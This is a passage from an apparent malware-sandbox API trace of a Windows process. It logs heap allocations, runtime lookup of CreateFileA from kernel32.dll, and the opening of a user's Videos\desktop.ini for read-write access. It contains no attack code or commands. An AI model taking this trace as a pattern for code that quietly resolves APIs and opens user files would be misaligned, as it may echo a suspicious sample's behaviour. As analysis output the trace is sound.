Size=0x4) returned 0x7af598 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.837] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce38 [0041.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.837] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0041.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.837] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0041.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0041.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0041.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x31) returned 0x7c2080 [0041.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", cchWideChar=49, lpMultiByteStr=0x7c2080, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpUsedDefaultChar=0x0) returned 49 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.839] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=49, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x62) returned 0x7c10a8 [0041.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=49, lpWideCharStr=0x7c10a8, cchWideChar=49 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 49 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0041.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0041.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.841] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0041.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.843] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0041.843] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, 